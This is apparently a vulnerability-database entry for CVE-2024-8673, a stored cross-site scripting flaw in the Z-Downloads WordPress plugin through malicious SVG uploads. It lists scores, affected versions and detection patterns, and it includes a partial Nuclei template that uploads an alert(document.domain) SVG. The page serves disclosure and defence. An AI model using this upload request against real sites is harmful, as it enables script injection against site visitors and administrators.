CVE-2024-8673
published 2025-05-15CVE-2024-8673: The Z-Downloads WordPress plugin before 1.11.7 does not properly validate uploaded files allowing for the uploading of SVGs containing malicious JavaScript.
PriorityP264critical9.1CVSS 3.1
AVNACLPRNUINSUCHIHAN
EXPLOIT
EPSS
1.63%
73.3th percentile
The Z-Downloads WordPress plugin before 1.11.7 does not properly validate uploaded files allowing for the uploading of SVGs containing malicious JavaScript.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| urbanbase | z-downloads | < 1.11.7 | 1.11.7 |
Detection & IOCsextracted from sources · hover to see the quote
path/wp-content/uploads/z-downloads-[a-f0-9]{32}/files/[a-f0-9]{32}/xss.svg
url/wp-admin/admin.php?page=z-downloads-files
filenamexss.svg
- →Detect SVG upload exploitation by matching HTTP 200 responses with Content-Type 'image/svg+xml' containing the XSS payload 'alert(document.domain);' served from the Z-Downloads upload path.
- →Monitor for SVG files uploaded to the Z-Downloads plugin upload directory matching the pattern /wp-content/uploads/z-downloads-<32hexchars>/files/<32hexchars>/xss.svg.
- →Watch for multipart form-data POST requests to the Z-Downloads file upload endpoint containing SVG payloads with embedded JavaScript (e.g., alert(document.domain);).
- →The plugin fails to properly validate uploaded files, allowing SVGs containing malicious JavaScript to be stored and served; flag any SVG upload to the Z-Downloads plugin directory. ↗
- ·The nonce value in the upload request is dynamic and must be extracted from the page prior to exploitation; static replay of the request will fail without a valid nonce.
- ·The upload directory name and file subdirectory both use 32-character hex strings, making the exact path unpredictable; detection must use regex-based path matching rather than static path matching.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Z-Downloads < 1.11.7 - Cross-Site Scripting
nuclei·CVSS 9.1
CVE-2024-8673 [CRITICAL] Z-Downloads < 1.11.7 - Cross-Site Scripting
Z-Downloads
alert(document.domain);
-----------------------------191511049038951322013765412437
Content-Disposition: form-data; name="nonce"
{{nonce}}
-----------------------------191511049038951322013765412437
Content-Disposition: form-data; name="submit"
Upload
-----------------------------191511049038951322013765412437--
- |
GET /wp-admin/admin.php?page=z-downloads-files HTTP/1.1
Host: {{Hostname}}
- |
GET /{{payloadurl}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code_5 == 200
- contains(content_type_5, "image/svg+xml")
- contains(body_5, "alert(document.domain);")
condition: and
extractors:
- type: regex
name: payloadurl
part: body
regex:
- /wp-content/uploads/z-downloads-[a-f0-9]{32}/files/[a-f0-9]{32}/xss\.svg
internal: true
# digest: 4b0a00483046022100
No writeups or analysis indexed.
2025-05-15
Published